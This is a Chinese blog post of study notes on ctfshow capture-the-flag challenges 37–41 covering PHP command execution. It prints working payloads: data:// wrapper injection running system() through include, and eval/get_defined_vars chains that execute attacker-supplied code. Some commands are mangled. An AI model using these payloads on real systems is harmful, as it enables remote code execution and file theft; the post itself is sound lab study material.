命令执行day2

最新推荐文章于 2024-07-30 21:02:40 发布
最新推荐文章于 2024-07-30 21:02:40 发布
阅读量180 收藏
点赞数
分类专栏: 命令执行 笔记 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zbbjya/article/details/123648927
版权

听课笔记的理解与知识积累
课程在哔哩哔哩上https://www.bilibili.com/video/BV1jy4y1a7Ew?p=13&spm_id_from=pageDriver

ctfshow37

在这里插入图片描述相较于之前多了一个include,flag被过滤
在这里插入图片描述

通过data://text/plain协议来进行漏洞利用。

?c=data://text/plain,<?php phpinfo();?>

发现执行成功
在这里插入图片描述?c=data://text/plain,<?php system("mv flag.php");?>
在这里插入图片描述将文件复制到1.txt 再将flag的用占位符替代一个然后这样去执行得到flag,再访问1.txt就可得到
在这里插入图片描述

ctfshow38

将php过滤了
在这里插入图片描述原本的php由<?代替 <?为短字符
然后改下复制到1.txt 就可以得到了

ctfshow39

在这里插入图片描述在这里插入图片描述 。;模块,
然后就会得到flag

ctfshow40

在这里插入图片描述在这里插入图片描述这个是代码的解释与意思从后往前看
这个代码是通过货币信息去这个点
然后扫描当前目录
将目录的结果进行翻转
然后取下一个显示源码

?c=show_source(next(array_reverse(scandir(pos(localeconv)))))

另一种方法
先将变量打印出来,我们可以得到当前的所有变量
代码

?c=print_r(get_defined_vars())

加一个post数组再用next

?c=print_r(next(get_defined_vars()))

在这里插入图片描述
就可以拿到一个数组在这里插入图片描述拿到数组后对数组进行一个弹出然后打印一下

?c=print_r(array_pop(next(get_defined_vars())));

发现弹出然后我们知道需要让它执行了就可以了

?c=print_r(eval(array_pop(next(get_defined_vars())))):

ctfshow41

过滤了特别多的东西
看不懂 要用脚本来做,对脚本这些还是不太了解,不会
在这里插入图片描述

题目总结

37

通过data://text/plain协议来进行漏洞利用。

?file=data://text/plain,<?php phpinfo();?>
?c=data://text/plain,<?php system("mv flag.php");?>

关于一些知识点也包含file=data,涵盖很广,文件包含漏洞相关知识总结
原文链接:https://blog.csdn.net/qq_27710251/article/details/108039876

38

原本的php由<?代替 <?为短字符
然后改下复制到1.txt 就可以得到了

39

还有 cat的过滤
将php,flag用占位符代替掉就好
深入了解文件包含和命令执行的问题

40

这个是代码的解释与意思从后往前看
这个代码是通过货币信息去这个点
然后扫描当前目录
将目录的结果进行翻转
然后取下一个显示源码

?c=show_source(next(array_reverse(scandir(pos(localeconv)))))

另外一种方法

?c=print_r(get_defined_vars())

加一个post数组再用next
拿到数组

?c=print_r(next(get_defined_vars()))

拿到数组后对数组进行一个弹出然后打印一下

?c=print_r(array_pop(next(get_defined_vars())));

发现弹出然后我们知道需要让它执行了就可以了
eval()执行函数

?c=print_r(eval(array_pop(next(get_defined_vars())))):

对函数了解不够深刻,先记下再去理解

40

不会就还没总结

zbbjya
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmd echo写入shell_学习笔记-命令执行及花式bypass写shell
weixin_30801745的博客
01-26 1724
命令执行的坑其实早就想填了。最早是因为校赛时,easyphp一题自己因为不熟悉命令执行的一些特性导致套娃题绕到最后一层却没拿到flag。当时十分不爽,下定决心要好好了解下命令执行的相关知识点。关于命令执行我大体上归为php绕过+rce两类。php的难点主要是在绕过写shell上,而linux的知识主要在RCE达成上。先从简单说起:linux 命令& RCErce,即remote comma...
CTFshow 命令执行 web40
Kradress的博客
10-30 1691
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 06:03:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){ $c = $_GET['c'];
get_defined_vars() 函数
冷月醉雪的博客
04-24 690
查看更多 https://www.yuque.com/docs/share/6ef686e4-b03d-43c2-b74e-bde464d38ea0
2018领航杯awd简单复现
plant1234的博客
12-19 3660
首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: 这里能cat flag 修补增加过滤或者删除漏洞 2级的fwrite审计: 利用seay工具进行代码审计: 源码: 可以发现这是一个日志记录,但是它把记录的日志都写入到了 /var/www/html/log.php文件,这就造成文件写入漏洞 我们利用这个log1.php用get的方式写一个<?
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1402
CTFshow 命令执行 web29 web30 web31
NOIP2018_day2.pdf
02-06
### NOIP2018复赛提高组Day2知识点总结 #### 一、基本信息 - **比赛名称**:全国信息学奥林匹克联赛(NOIP2018)复赛提高组day2 - **比赛时间**:2018年 - **比赛内容**:包含三个题目,分别为“旅行”、“填数...
day2day
03-19
标题 "day2day" 暗示这可能是一个个人或团队在日常工作中积累并分享的实用工具集合,主要关注提高工作效率。描述指出这是一个运行中的仓库,包含多种命令、脚本和命令行界面(CLI)任务,这些都表明这是一个用于自动...
DB2常用命令
09-05
- **注意事项**: 在执行命令前,确保已安装了DB2客户端,并且数据库服务正在运行。 #### 2. 强制关闭所有应用程序 - **命令**: `db2 force application all` - **描述**: 强制关闭与数据库相关的所有应用程序会话...
Linux课程Day2
02-17
在“Linux课程Day2”中,我们将会深入探讨Linux操作系统的核心概念和常用命令,这是学习Linux系统管理和自动化工作流程的基础。Linux是一种免费且开源的操作系统,它的灵活性和稳定性使其成为服务器、开发环境以及...
致远OA-A8系统的0day远程命令执行的实战-附件资源
03-05
致远OA-A8系统的0day远程命令执行的实战-附件资源
ctfshow 命令执行
qq_53755216的博客
05-05 527
前面做的时候没总结从第40题开始总结 web40 <?php if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){ eval($c); } }else{
2021-08-04 CTFer成长之路-任意文件读取漏洞-文件读取漏洞常见读取路径(PHP版)
热门推荐
时光隧道
07-09 5万+
兵者多诡(HCTF 2016) 【题目简介】在home.php中存在一处include函数导致的文件包含漏洞,传至include函数的路径参数前半部分攻击者可控,后半部分内容确定,不可控部分是后缀的.php。 在upload.php处存在文件上传功能,但上传至服务器的文件名不可控。 【题目难度】中等 【知识点】php://协议的Filter利用;通过zip://协议进行文件包含 【解题思路】打开题目,发现首页只有一个上传表单,先上传一个正常文件进行测试。通过对上传的数据进行抓包,发现POST的数据传输到
命令执行
jie_a的博客
05-09 405
命令执行文件包含源码1.代码执行如果过滤system如过滤点单引号 和 点过滤了分号 和 括号过滤了include过滤了数字过滤了很多符号利用函数echo print isset unset include requireprint函数变了源代码eval变成include过滤了flag过滤了PHP强制加后缀PHP 并且不回显include变成system需要url编码提交过滤了分号过滤了cat.flag过滤了空格过滤了所有空格过滤了<>函数变成可利用函数 文件包含 源码 if(isset($_G
RCE和php文件上传
最新发布
m0_71332744的博客
07-30 703
在网络安全领域,远程命令执行(RCE)和文件上传漏洞是两种常见的攻击方式。本文将带大家深入了解这两种漏洞的原理、利用方法以及如何进行有效防御。
53、PHP 实现归并排序
weixin_44010641的博客
07-30 217
【代码】53、PHP 实现归并排序。
WordPress原创插件:搜索引擎抓取首图seo图片
爱酷码的博客
07-29 376
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 988
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
PHP一维数组怎么转关联数组
qq_32450471的博客
07-30 206
php是一门广泛应用于web开发的脚本语言。其强大的数组功能是其最重要的特征之一。在PHP中,数组是一个能够存储多个值的变量,并且这些值可以是任何类型的数据,比如整数、浮点数、字符串、布尔值、对象等等。此外,数组还可以分为索引数组和关联数组。本文主要介绍PHP中一维数组转关联数组的方法。
应急靶场(11):【玄机】日志分析-apache日志分析
OneMoreThink
07-30 293
题目提交当天访问次数最多的IP,即黑客IP黑客使用的浏览器指纹是什么,提交指纹的md5查看index.php页面被访问的次数,提交次数查看黑客IP访问了多少次,提交次数查看2023年8月03日8时这一个小时内有多少IP访问,提交次数靶场地址:https://xj.edisec.net/challenges/291、提交当天访问次数最多的IP,即黑客IP已知中间件是Linux上的Apache,常见日...
Oracle Database Express Edition 2 Day DBA 教程
"Oracle® Database Express Edition 2 Day DBA.pdf" 这是一份关于Oracle数据库管理的快速入门指南,特别针对Oracle Database Express Edition (XE) 11g Release 2 (11.2)。Oracle Database Express Edition是...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值